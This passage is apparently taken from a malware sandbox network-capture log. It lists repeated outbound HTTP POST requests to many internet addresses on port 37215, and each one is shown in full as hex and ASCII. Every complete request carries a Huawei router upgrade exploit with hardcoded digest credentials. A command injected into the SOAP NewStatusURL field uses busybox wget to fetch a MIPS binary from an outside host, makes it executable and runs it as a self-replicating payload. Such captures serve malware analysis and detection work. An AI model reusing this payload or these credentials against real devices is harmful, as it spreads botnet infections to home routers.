                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2174192.168.2.1359660197.202.161.5437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.594891071 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2175192.168.2.134794441.128.100.6837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595005989 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2176192.168.2.1348542161.30.134.11037215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595012903 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2177192.168.2.1360154152.62.50.11737215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595411062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2178192.168.2.1355448197.20.184.18437215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595411062 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2179192.168.2.133314841.230.130.12637215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595428944 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2180192.168.2.1356492197.112.97.6537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595443010 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2181192.168.2.134721441.196.135.15537215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595464945 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2182192.168.2.134109641.224.228.8837215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595467091 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
                                                  Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 32 33 37 2e 38 37 2e 32 34 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b 20 2f 74 6d 70 2f 2e 6f [TRUNCATED]
                                                  Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.237.87.24 -l /tmp/.oxy -r /mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  2183192.168.2.1347044157.9.175.5337215
                                                  TimestampBytes transferredDirectionData
                                                  May 24, 2024 10:59:06.595493078 CEST825OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                  Connection: keep-alive
                                                  Accept: */*
                                                  Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                  Content-Length: 456
